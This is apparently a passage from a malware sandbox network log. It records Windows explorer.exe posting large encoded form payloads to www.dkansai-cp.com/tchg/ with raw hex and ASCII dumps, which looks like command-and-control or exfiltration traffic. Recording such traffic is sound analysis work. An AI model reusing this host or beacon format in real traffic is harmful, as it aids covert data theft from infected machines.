                                                                                                                    May 30, 2023 11:08:27.052826881 CEST376OUTData Raw: 71 55 33 33 77 4d 6e 42 52 34 36 67 67 44 69 35 7e 71 64 6b 33 43 58 4c 79 6a 6a 34 49 39 4f 49 6e 6a 42 7a 6b 31 79 58 76 6d 35 7a 70 6b 4c 58 30 73 72 69 4f 68 44 57 78 4b 53 4a 61 2d 74 68 28 77 46 35 65 43 53 6f 30 67 42 57 6a 38 45 4d 61 30
                                                                                                                    Data Ascii: qU33wMnBR46ggDi5~qdk3CXLyjj4I9OInjBzk1yXvm5zpkLX0sriOhDWxKSJa-th(wF5eCSo0gBWj8EMa0kF3zl9yleOo0kbQjEgKN4pd0MlJpw1DHVXOysqHgM9Aiakb5wuO9EGkmGu(2y0XXYKWO57CKQElIwx2xB8(tUcfipVZyRaFlJohDvZPcjDkzNDZeSZj4TialdMgUyUHW5Gjm11dTzV6HglEnZhbuOUkpPR5zFEclf
                                                                                                                    May 30, 2023 11:08:27.063687086 CEST379OUTData Raw: 32 77 35 65 69 6a 79 73 59 4d 6d 35 50 57 7a 35 6c 68 49 4c 58 4e 4e 52 47 53 6e 31 6a 30 36 51 34 6b 4d 36 6f 42 52 54 45 35 63 4f 6c 37 72 61 6a 61 56 68 4f 6b 37 75 6b 72 30 62 4f 50 75 4b 39 46 4a 4a 49 59 69 67 37 55 28 66 76 57 64 67 4d 75
                                                                                                                    Data Ascii: 2w5eijysYMm5PWz5lhILXNNRGSn1j06Q4kM6oBRTE5cOl7rajaVhOk7ukr0bOPuK9FJJIYig7U(fvWdgMuVzTkocKla0cvzNI6qEiO7850Q-jAax6yHzMqVwwegD8QSEBRfWYkBc8KE5xNMWZWyc11OMt9kxnI4ZQXC_Exp25zR2xXhptvvnyi5j~nIIv5g7QtxRRJMbDjQrsTS01Q8888l11Hveu_RjRfurC8Z3qE8rWbB3P81
                                                                                                                    May 30, 2023 11:08:27.063863993 CEST390OUTData Raw: 63 71 5a 36 68 62 53 55 66 50 55 69 63 73 35 74 71 62 34 55 42 34 54 66 38 4d 79 47 6e 59 50 67 37 51 4c 42 4b 70 59 55 28 35 39 76 4a 6d 31 6f 56 35 39 6e 34 56 50 38 57 6a 6e 45 44 79 6c 73 4e 41 73 51 6c 6b 75 6a 31 54 79 6d 6a 79 49 38 5a 48
                                                                                                                    Data Ascii: cqZ6hbSUfPUics5tqb4UB4Tf8MyGnYPg7QLBKpYU(59vJm1oV59n4VP8WjnEDylsNAsQlkuj1TymjyI8ZHZsTZ8jG9pzfGJINdGcSThwwJVP2UT2hRVz2PuOcFLgbpzfFawZeyyfOiaRB-Xr~JkcTYbSrJBtt16xEttNe9ZwoUx699QBUWzYSsYLvJvbBM4lCmpTjJXzsfcKAdwVOB3ZvLBkbBNKq7J6sKustRuqBTTmEcVHBkt


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    90192.168.11.2049849183.90.238.4380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:03.783010960 CEST1675OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.dkansai-cp.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.dkansai-cp.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.dkansai-cp.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 6c 54 47 5f 69 5a 51 31 65 38 72 54 58 65 47 43 6a 41 6d 6f 5a 6f 67 52 71 32 36 45 34 5f 33 59 4f 71 48 75 41 43 39 74 75 52 28 46 4b 76 4e 33 77 48 43 6d 74 66 32 45 39 6d 70 76 7e 66 42 48 28 53 6d 49 6a 34 6d 50 7a 4d 47 73 64 77 47 7a 54 44 63 5f 50 64 6e 65 50 39 49 61 4f 67 65 47 69 59 49 45 41 51 71 39 74 4f 69 68 31 74 47 4f 7e 46 51 5f 68 45 7e 58 4a 77 69 53 39 31 36 46 6d 4c 79 77 28 46 5a 67 32 36 53 51 67 67 6d 34 4c 38 56 65 43 61 4a 72 56 2d 42 68 28 68 39 39 48 76 45 31 38 63 7e 47 46 43 6c 6f 6b 50 68 6a 52 6f 50 5f 37 53 37 6a 7e 47 28 58 71 38 4a 68 75 7a 37 78 72 30 4c 66 79 4e 63 65 48 41 6b 41 6a 37 4c 2d 32 55 5a 67 73 59 30 46 65 56 38 6e 4a 62 37 67 66 77 48 66 56 57 76 4e 57 79 42 59 43 70 70 7a 52 4b 58 69 41 6e 61 37 6b 65 79 61 65 33 42 45 78 4a 78 54 45 63 6c 61 61 4c 50 76 6d 62 6d 51 6c 74 6a 39 48 62 70 6a 64 4d 4e 4c 35 32 73 65 7a 68 30 4d 38 66 4f 38 54 35 31 41 4b 48 48 36 6a 79 75 71 63 74 72 48 50 2d 4e 62 70 6f 7a 5f 76 44 49 43 6a 6d 56 4c 4e 41 7e 78 51 34 66 71 4d 6d 33 64 58 76 70 47 37 6c 4e 32 54 35 4e 71 4f 67 6c 6d 4e 48 67 37 65 65 36 50 36 30 71 67 49 71 78 6c 37 54 4d 57 62 6f 58 52 6a 4f 52 30 28 4a 6b 6c 32 51 49 31 59 35 67 57 61 54 65 55 6e 6f 4b 6d 46 6b 72 75 77 73 66 32 4f 77 5a 7a 56 73 6f 71 54 43 64 79 35 2d 77 54 59 44 47 4a 50 7a 59 4b 33 76 78 6c 59 39 7a 78 30 69 39 79 63 5a 49 4d 6c 6e 54 34 77 4c 57 59 36 46 6f 41 53 42 73 71 53 64 52 4f 54 57 64 4d 42 35 77 76 72 57 4a 43 43 44 6e 6b 66 52 38 52 67 35 4b 45 73 61 51 5a 47 71 79 74 4f 74 32 4e 57 61 57 30 63 79 7e 30 51 6f 34 5a 53 70 75 41 62 74 56 58 7a 59 53 48 33 72 66 4a 72 33 58 6a 52 33 62 68 55 70 49 70 48 62 4b 70 43 34 77 68 73 79 4f 7a 74 65 59 65 57 46 49 30 55 71 42 6f 49 34 50 43 65 54 32 62 55 31 52 4a 37 4a 48 35 67 51 33 46 48 62 7e 6a 76 46 76 76 36 51 55 41 64 69 4e 33 43 73 7e 44 51 43 69 35 47 36 64 37 76 45 57 79 54 37 66 79 34 6f 36 65 37 35 45 63 35 30 28 36 65 74 57 59 7a 76 4c 50 59 70 57 34 32 31 68 6c 35 61 39 53 76 69 73 51 32 6e 7e 67 57 79 64 66 77 62 73 52 42 51 46 75 43 56 53 6c 39 51 79 2d 6b 42 68 35 61 63 43 34 52 47 46 45 56 39 43 56 64 4d 4e 5a 6a 68 61 37 31 47 6c 46 54 52 28 43 70 47 4c 31 36 54 63 73 6c 73 54 72 78 71 70 43 46 6d 73 7a 6e 48 39 5a 37 39 66 41 34 58 4a 43 44 46 55 57 49 64 55 5a 79 77 7a 34 72 65 53 74 4e 75 63 67 70 59 73 79 4c 66 35 61 4b 35 28 70 45 31 37 61 4a 64 47 72 42 4c 51 52 43 43 62 6d 28 38 52 45 62 47 28 4c 6f 2d 7a 70 35 42 6a 36 6b 32 35 71 7e 76 47 69 67 69 56 54 36 7a 72 45 52 30 33 31 57 70 54 66 6d 4e 6e 6f 42 39 54 38 46 58 7e 79 62 51 31 44 6b 66 53 6d 46 73 71 70 4a 73 33 5f 53 6e 38 79 4c 44 59 4e 71 66 69 64 48 75 57 6c 52 39 32 35 53 43 55 63 61 69 76 70 32 6e 51 44 57 4f 58 74 42 5a 54 2d 55 6d 49 32 76 70 6c 4c 37 4d 77 45 56 72 32 6d 67 58 76 76 54 59 33 46 6d 76 61 30 62 77 77 33 37 37 79 74 48 6d 63 67 79 4d 41 53 46 55 6e 46 59 79 62 5f 37 68 72 42 55 48 6d 79 4d 56 56 73 28 6b 37 58 65 49 31 42 51 43 4d 41 41 65 71 4e 49 62 75 5a 79 65 32 47 43 51 4e 65 7a 61 77 6e 75 64 37 68 4d 46 56 42 6c 69 63 55 56 65 6e 74 6c 37 55 47 6d 65 47 61 34 65 78 7a 37 51 37 55 51 6e 77 69 4b 4b 6f 4f 35 39 7e 36 38 61 74 77 7e 53 6d 32 56 55 51 69 58 63 4a 55 62 53 7e 34 52 4f 4c 77 37 64 6f 62 38 44 54 71 58 5a 53 4e 6c 30 44 77 4e 55 36 4a 6b 32 48 42 67 4d 4e 48 4e 42 47 37 49 74 79 4a 7e 45 67 30 46 77 69 5f 4a 4f 32 32 64 63 78 6d 41 64 50 53 32 6d 38 6f 65 45 57 34 57 73 38 2d 75 5f 6d 4e 55 34 51 4b 33 6c 36 75 6d 4a 69 75 79 44 38 55 52 73 45 45 36 64 57 53 57 57 77 49 66 79 44 71 48 49 31 72 33 39 4e 77 76 71 75 46 65 39 79 73 6f 59 37 4e 66 63 42 4f 59 49 68 38 44 65 79 30 5a 68 48 66 6a 6f 49 46 4e 56 62 57 71 76 79 33 67 56 51 62 6b 73 36 75 69 67 59 43 65 59 79 42 78 44 58 68 33 66 7a 64 63 35 46 68 4f 68 49 57 55 4d 6b 45 38 41 59 55 50 66 55 51 34 78 48 62 37 4c 77 56 50 6c 51 53 45 31 70 68 4d 38 65 5a 62 55 43 66 64 78 41 56 47 58 73 38 36 79 54 34 36 61 72 53 38 4c 69 54 4c 6d 50 61 31 79 6c 46 67 72 5a 30 31 46 69 35 55 4d 7a 72 52 32 41 55 4e 72 74 34 6e 72 50 5a 37 7a 6b 35 44 73 62 48 67
                                                                                                                    Data Ascii: O0qEM=lTG_iZQ1e8rTXeGCjAmoZogRq26E4_3YOqHuAC9tuR(FKvN3wHCmtf2E9mpv~fBH(SmIj4mPzMGsdwGzTDc_PdneP9IaOgeGiYIEAQq9tOih1tGO~FQ_hE~XJwiS916FmLyw(FZg26SQggm4L8VeCaJrV-Bh(h99HvE18c~GFClokPhjRoP_7S7j~G(Xq8Jhuz7xr0LfyNceHAkAj7L-2UZgsY0FeV8nJb7gfwHfVWvNWyBYCppzRKXiAna7keyae3BExJxTEclaaLPvmbmQltj9HbpjdMNL52sezh0M8fO8T51AKHH6jyuqctrHP-Nbpoz_vDICjmVLNA~xQ4fqMm3dXvpG7lN2T5NqOglmNHg7ee6P60qgIqxl7TMWboXRjOR0(Jkl2QI1Y5gWaTeUnoKmFkruwsf2OwZzVsoqTCdy5-wTYDGJPzYK3vxlY9zx0i9ycZIMlnT4wLWY6FoASBsqSdROTWdMB5wvrWJCCDnkfR8Rg5KEsaQZGqytOt2NWaW0cy~0Qo4ZSpuAbtVXzYSH3rfJr3XjR3bhUpIpHbKpC4whsyOzteYeWFI0UqBoI4PCeT2bU1RJ7JH5gQ3FHb~jvFvv6QUAdiN3Cs~DQCi5G6d7vEWyT7fy4o6e75Ec50(6etWYzvLPYpW421hl5a9SvisQ2n~gWydfwbsRBQFuCVSl9Qy-kBh5acC4RGFEV9CVdMNZjha71GlFTR(CpGL16TcslsTrxqpCFmsznH9Z79fA4XJCDFUWIdUZywz4reStNucgpYsyLf5aK5(pE17aJdGrBLQRCCbm(8REbG(Lo-zp5Bj6k25q~vGigiVT6zrER031WpTfmNnoB9T8FX~ybQ1DkfSmFsqpJs3_Sn8yLDYNqfidHuWlR925SCUcaivp2nQDWOXtBZT-UmI2vplL7MwEVr2mgXvvTY3Fmva0bww377ytHmcgyMASFUnFYyb_7hrBUHmyMVVs(k7XeI1BQCMAAeqNIbuZye2GCQNezawnud7hMFVBlicUVentl7UGmeGa4exz7Q7UQnwiKKoO59~68atw~Sm2VUQiXcJUbS~4ROLw7dob8DTqXZSNl0DwNU6Jk2HBgMNHNBG7ItyJ~Eg0Fwi_JO22dcxmAdPS2m8oeEW4Ws8-u_mNU4QK3l6umJiuyD8URsEE6dWSWWwIfyDqHI1r39NwvquFe9ysoY7NfcBOYIh8Dey0ZhHfjoIFNVbWqvy3gVQbks6uigYCeYyBxDXh3fzdc5FhOhIWUMkE8AYUPfUQ4xHb7LwVPlQSE1phM8eZbUCfdxAVGXs86yT46arS8LiTLmPa1ylFgrZ01Fi5UMzrR2AUNrt4nrPZ7zk5DsbHg6XNoqZRfn8gci2ZNcw9WMv8~JNkQFrTlncywDYLLHvhEqnBVfw-kMadLRdCa6Y2405wTf97Iay4zvr_KYEcVRp6TNuuOENPM-kmtTBg6L9N3Kgh(RMhpWCROuKnqaHyV7VGHplXrRpLQdX6zdfxztAfiCezpfSs2OvY76AGZJ2REyx_Qrlm02RRSYuYx4Mfl4thGl4m59hUmm9NrY6rL7FyB6afAGDo(bBpJ7iKoQ53GOg4lmnae3qD9XrhioOWQ-1g76UIKPcIJyjdmC94WnXwKArv2xYI~VhTtxFHml7R6TedrNMLfchMp7DxOxOvlmO4IIXamDQ2pVVDGNHCW3RelnRpS0YtwAE9HTSyyBABVQBh59yDipRZ2ruTWqi1dLdFiI55C8ExmDkT50wWf8dDEGiwhT76dCUtclSRtrUldyz067Iq7vc-n9qtiAZ6ZWGh~TnGswpL~1y4cGq2BpEVtJze9eTNnsnTd-yBq2vKD-CIaW6Y2KGQ4OGBc0yOM98n9BNwLmQx45fX4H3jcAspxpUx4bCpEfG-kx0GHVw-unkpT9hFAf3rDYGGK46cwVJ4RJXVEzKf3PuKn9Y7NZaBDa6TCSifiLTeuvzJTM59Kt~vWATb(c2yeApVFwNWWTdnUQu_nu5SGC4z8pdrNeevY-nI2GDk1JKqG9JnwdLcQvMYpUg4fwlPn6yqeYmY(1GQIVUpMuBkdOXVM38eHUSDDhP3OD7J8F8J5Mm6h0WGF4EqgcOGJIZWMDapHy9qyf88yqO663z6AQUcMctiAT(ttke9nZ0FEaCacepUS9JAD65oIFpiE_QNTfo03yqws5Vyj2BvdaQUjVQzr8rmSOcP4h3EDRqWG4fERBA_2YeYfmXQ~89NJ5MpAVciStFZ6_Z585Xiy252cR7WlVkE5WN0sg4Z~Zdw6F(ixTClsPW6KJtpJfR-krzXx9~tnyLFg1bLUoRnLLPENgEoZjY-avLiOkvyV1DsmlfLzP~-h7AdiICyVf0jmo~131255v4_3f6Qbc7T4pqgYE2Soe4Ah4uAoVpzdBphcvG1~Adwme9Ck2xnF8fuXVT-zE3Nhn4Um2tJz6rjaLLjuyUQXeKl0z(ANifMN9ydNff0OzIm9WTHchKgLkgKWO68JrQAhDKuZMEXs0GFxhfDqZeeNqVeBvxddUq9HbIgRLaxnwFoISmhO15VEX(RT23WFCWimWETiovJKttHnZak~_geBPHHjx594JAmqOol4l0ovx(BFIl2Yq8MqTRCKbvg9w91EDskTVhcxwtzUTtJyxiBFJvyBBUje0Yk1anxGEW6uweTMFgFRT(2n8hAOEQEQgwXoxd7quHmDuYBZ6zEmZVN0w~8oXimHXxq0atRYTh_JoZLMvYOGAWpPk(cJ3E8kEaGUIkGy3I3p2W4YGPAxhb3YUyHVAIPdzc_92PHtsMfABC9tcC18pAFfFtTsoQwUQUbcBa0XxkLGrCsYj1wlXXYS5PyTXji4oruKmwX4a8YD4aH~FCiEK4DPbULxQNAFFPsddYfQvFQlQdENzwCXM2586gXmHjSsaXt1-qW~hyP33w-8VOBiZSvKc66rthAky~QYlMUc-~iVy2syaoeLsx8pqj6~LmnodiESoqqPhbpkyu4elG_RbhdCdafvDrH4QqdH7THZGFAgSJ7BQ1gdwrj94WifI1tUw9syiax8sD5GBbMHlMf2bMLlfC64ycE9ksPaPTvg4PiUZJ609LpsJRDwAQqvJB0RC2pn47vf0XVZzVfAuekhaYLjGzms-C2Z2UFqSCETPemStSi8xUPlv33niw0NBtnDvL8bHiL7HGmofTC4aQcUW1bruY8o18DuWU5y9zh(M3qihSDhrWfflHHP0pqZ5zJlDwXIhZtL-MtCHaZWOKxf4Ho6CXHURsYjYkaqQUbBYCLZ5nqqZF_HgBFwXkmnm27NxCnhI1pOXOj0v(zBUQLR7RXu2~Ssnwcg-VP3iQ6G-NWACrYwWO-7ihbOcdhkPpvyCbfjrBu8bujmqyie02Umph1BtstWWh021SSzvpPN3APPRfH4TAVJ0pXNg6znD(ojuleShdPr49jcmAtokLYwpk9wcT6ckjCycfOGL5B18~ZwPEJlaARIAvlNf3Tm9y1VMJLOYuumghccdlalBy9G4NG1c47hPFxvV1eBOImTRmDfpqeErbNGYHh~cS2AdkIzejnPdMxkwIMKKwTIpFNGxYoRCp_sWTo8rtSHzPj2fQI~c(8V15NWoHueMF8oqHmh4~PamoswwAqoaYWEJGqK5ibCug9W_gO03I28qLRAdqrWgFRyAMZvl8pEPpTIUZK5etObv5xDVoeiOUFt1(EhU294gKUHe5UDNOy4SRvHp7YHBQHC8yjnS6roPQySuAH(VoxTKV9733Rp7xvJMBEqzZlPUEUoS2kjgiUb9XH3fgPCYOyCARZLGa5iNsCJsWdJwvmyUmR0J4iBpBAEkAEFWRT09Jz1TqPrpcgqhSmLMczwrUHJEXk6DN0WAqylxIJMHJq6HrNo0zJR3C5HGVLfNpn~6PZD0z6nlC_SOdhYuKTWweNK5rHWasrDYMuD8LDLmKOLOITowEH1jdoRXFtgxHyeIQBUheOnaZydmEehDBc(89PB_VSuBmGVi9aW_APaEjuzs8Aq9sOBiyI~qTaWGJ5bFzfg20amFS6tyFgLOUlMAa4cuZmX4sQwwWpoCl4woWFBwqxQVVi
                                                                                                                    May 30, 2023 11:13:03.783097982 CEST1679OUTData Raw: 28 79 61 66 43 6f 77 46 65 4d 4d 70 33 63 46 66 6d 41 6c 4a 66 47 28 69 50 6c 50 4d 4f 72 61 74 49 68 46 32 53 5a 6d 42 47 46 74 77 79 37 59 50 61 6f 68 33 33 58 5a 6d 34 79 30 6f 64 4b 52 6f 6c 65 77 79 7e 67 56 77 77 56 35 59 50 61 38 4e 41 56
                                                                                                                    Data Ascii: (yafCowFeMMp3cFfmAlJfG(iPlPMOratIhF2SZmBGFtwy7YPaoh33XZm4y0odKRolewy~gVwwV5YPa8NAVw3k9czGyDzS6PSdpwxM66vbo9dTip1nA8SmCeUKoGReqN4LHoGZZmXCdUDZ8z9o_xe5_Y50unmszzU42WUJ9EWjEGAAJPy586fHrwAJLgNDwACPljgiysGlnXv0vXf7rqPiaf9Z6rG7_8JFn3yBl35xKooIlPDN0m
                                                                                                                    May 30, 2023 11:13:04.050211906 CEST1685OUTData Raw: 7a 74 6a 5f 55 68 75 35 43 39 32 71 71 30 7a 6b 38 5a 63 58 4e 72 33 35 49 73 36 76 64 4e 61 53 77 39 32 6b 64 5a 55 2d 34 4b 65 70 6d 6c 36 50 67 38 64 44 30 4e 51 74 68 4a 49 36 48 48 74 57 69 6c 45 78 6c 71 6f 63 75 4d 4b 42 33 30 66 4d 6d 6e
                                                                                                                    Data Ascii: ztj_Uhu5C92qq0zk8ZcXNr35Is6vdNaSw92kdZU-4Kepml6Pg8dD0NQthJI6HHtWilExlqocuMKB30fMmno_gYSpHp4N7DiFJ0rUvMehYiB0YPcDCLM5(JatQmBnxjphsmnNUpRe46AEUEDs2cO5xQVZwRpJzoyaSjWvz_L46EtAk4s0IhTr8ssSK066drgAccnhdPQrD-CIY4SpfnZyUh~2deLBwbDI1KdSE0(WPlKd~rNaTxZ
                                                                                                                    May 30, 2023 11:13:04.050297976 CEST1694OUTData Raw: 71 76 55 73 53 52 64 59 6c 6a 46 6e 5a 69 59 42 44 31 6c 75 73 67 5a 75 4d 65 5a 6b 4e 6c 68 5f 37 5f 68 79 51 47 75 56 56 32 70 75 37 4f 4b 43 78 63 32 64 76 46 7e 6a 45 4c 52 67 48 41 38 5a 39 42 48 41 64 62 44 34 37 36 43 5a 4b 75 35 76 37 6a
                                                                                                                    Data Ascii: qvUsSRdYljFnZiYBD1lusgZuMeZkNlh_7_hyQGuVV2pu7OKCxc2dvF~jELRgHA8Z9BHAdbD476CZKu5v7jmE9VmCKMXYMztWWHVEhwzIUf~V1xVqQCX1pDx-IurPX0LnZ8aCeYXoF42-yako1Bq0fZcawvDf24RP20X4VyLL~ag4YQpq(3B98Q5mDZqv091PLLDz1DS1TwspPBB1A8UmkyWCyg96pj6Lco~I~nm9mJC6W4zF2pw
                                                                                                                    May 30, 2023 11:13:04.050606012 CEST1697OUTData Raw: 77 56 57 5a 43 6b 32 7a 56 6f 33 74 38 57 31 52 42 62 4f 39 68 36 6e 49 6f 54 50 63 30 45 35 4e 56 34 63 41 58 6a 7a 5a 4a 6f 54 74 65 43 4e 4e 4a 57 6d 41 61 30 7a 54 54 33 53 48 6a 51 41 5a 68 43 4a 4f 6a 39 59 4f 4f 64 6b 74 48 6e 39 52 75 77
                                                                                                                    Data Ascii: wVWZCk2zVo3t8W1RBbO9h6nIoTPc0E5NV4cAXjzZJoTteCNNJWmAa0zTT3SHjQAZhCJOj9YOOdktHn9RuwA23wQJeWfZxxAlKb(ulV9n0RqAFu2el0eDJpBqfBPOK_mRU4Z9syCwXfiYiVdpPOB3LWSDCvjT0dLxYeAaJkzGcnn9Roa642blKMMrJMydeWFZPJ6NBanVfcgOA-LSenLyuTLALtvT9Tv_8b5PG7p0oc66CUVt8FD
                                                                                                                    May 30, 2023 11:13:04.050776958 CEST1699OUTData Raw: 62 61 72 56 42 53 67 35 50 44 5a 50 42 6e 4a 44 62 57 66 77 76 38 76 64 76 5a 76 68 4c 36 55 4d 4d 63 36 4e 46 58 55 52 64 68 62 43 52 33 41 39 46 4a 71 44 75 6c 30 6d 32 36 35 4b 78 63 48 57 39 53 4f 41 53 33 6d 4c 48 69 74 75 58 68 4d 67 52 5f
                                                                                                                    Data Ascii: barVBSg5PDZPBnJDbWfwv8vdvZvhL6UMMc6NFXURdhbCR3A9FJqDul0m265KxcHW9SOAS3mLHituXhMgR_BFjwSYvRU4Z4FHkmHilgjvboH4NpvRr4KVUEu3JGCH(ZppuBsbEOjCL_cT4V3LV2eGwh0g3Ek5p86IKo8CPziVASCCwbdCBa~EQLr-ZghBXcjLzoE24g~4jmrp622aMT(P0u17P21ww7TEilXUsBd1IhPn0jch1uU
                                                                                                                    May 30, 2023 11:13:04.050951004 CEST1704OUTData Raw: 66 5f 4d 55 33 75 56 7a 46 50 5a 38 58 44 49 34 43 31 6f 45 47 6e 33 4d 61 71 43 6c 63 4a 4d 47 7e 34 70 4a 64 46 62 7a 59 42 4f 6f 4f 30 78 66 42 76 73 70 47 66 4e 64 50 4e 66 66 76 78 56 58 4b 4f 71 49 39 31 53 77 34 79 70 4b 64 5a 4d 4a 55 59
                                                                                                                    Data Ascii: f_MU3uVzFPZ8XDI4C1oEGn3MaqClcJMG~4pJdFbzYBOoO0xfBvspGfNdPNffvxVXKOqI91Sw4ypKdZMJUY7QGXwkt0tPkVWXmO5P8mwxmXw_2Ck6NAc9ckf3wa2TNcx4EG2x8eeJ4ZcxwLs20S6uau39uuP-tUYBVDNrBP65(BuywoV9kYQEwEBeEnA8eDQRth42a3JR3twNydiAgyy3npwqmuoTvjRj8axAJDNJ67ojOYni7qP
                                                                                                                    May 30, 2023 11:13:04.317523003 CEST1707OUTData Raw: 78 5f 45 43 59 33 4c 32 42 39 28 39 48 74 53 51 45 51 48 51 66 69 76 39 38 73 57 4a 61 33 66 4a 63 30 7a 73 36 4c 58 30 43 2d 32 74 41 51 77 7a 46 2d 69 64 4a 39 46 32 55 2d 36 65 46 33 41 33 61 78 4e 38 4d 4c 61 58 36 6a 58 68 74 54 49 64 5a 62
                                                                                                                    Data Ascii: x_ECY3L2B9(9HtSQEQHQfiv98sWJa3fJc0zs6LX0C-2tAQwzF-idJ9F2U-6eF3A3axN8MLaX6jXhtTIdZbaekdcYkB7gszvriYAUVGrUMLx5SbQJ0S4mm0gzKXuCop0LUPpjJ8OOo3G8WUL9EZ3CUpWu9Rd7CmK0D9inK0KGfgwT3W7IIuBzzn0EZfG_i0nT16yLX3y-k1evGXk4Usb9ts496tBsALXQ3rU8U_d-Gl72GPUYOwH
                                                                                                                    May 30, 2023 11:13:04.317718983 CEST1716OUTData Raw: 5a 53 31 48 42 7a 75 49 36 31 67 30 4b 43 75 42 59 59 72 64 42 45 4c 50 4f 50 4e 6e 79 56 57 71 73 4a 63 48 6a 79 54 5f 77 78 38 58 73 37 7a 54 35 70 61 64 4d 33 52 69 33 35 30 49 6f 30 54 2d 79 67 33 4b 64 74 4f 61 7a 47 73 6b 68 79 4c 71 78 66
                                                                                                                    Data Ascii: ZS1HBzuI61g0KCuBYYrdBELPOPNnyVWqsJcHjyT_wx8Xs7zT5padM3Ri350Io0T-yg3KdtOazGskhyLqxfkOEnyuxPMjG0Sa~HWGUkLEUwiGXCgFkd5MGi9B0oXkq30SO1exSTKbFrZkMrJ9(F8XTddNILChFy95xsSLhx7yM2VS5RsGiSnTnBQF1mhV~tIrXq17ghT6P1qxq8ns6buAVUud2LjmKnqnFO(c34VfKSJlQXnRwUW
                                                                                                                    May 30, 2023 11:13:04.317827940 CEST1718OUTData Raw: 74 54 52 56 76 46 44 49 6d 34 7a 31 38 69 34 50 49 34 7a 2d 54 62 35 47 74 36 69 51 73 58 73 77 64 43 64 65 52 7a 69 4e 58 2d 35 4b 75 76 4c 44 65 49 33 73 74 38 50 32 28 33 54 6d 41 31 4e 35 39 53 4a 54 78 63 6f 35 44 56 38 79 79 61 39 41 67 33
                                                                                                                    Data Ascii: tTRVvFDIm4z18i4PI4z-Tb5Gt6iQsXswdCdeRziNX-5KuvLDeI3st8P2(3TmA1N59SJTxco5DV8yya9Ag3xmH1vTEfzgGrfvJvDjf0Jxw7ULAgNaC6yQX3T_OYRjB_nydapV2Voif2(6OH2SRCX8XRYwKV9ZRyFwXfsgN3NbPLpVlhrZ50LPTFnszeqAeyQGjNSNbuaMHV0ypgnswxBf01fbQjTox7mktbo3vq0ySOzkGGG4ZIP
                                                                                                                    May 30, 2023 11:13:04.587376118 CEST1720INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:13:03 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Last-Modified: Mon, 02 Jul 2018 00:27:42 GMT
                                                                                                                    ETag: W/"afe-56ff9440f72fb"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 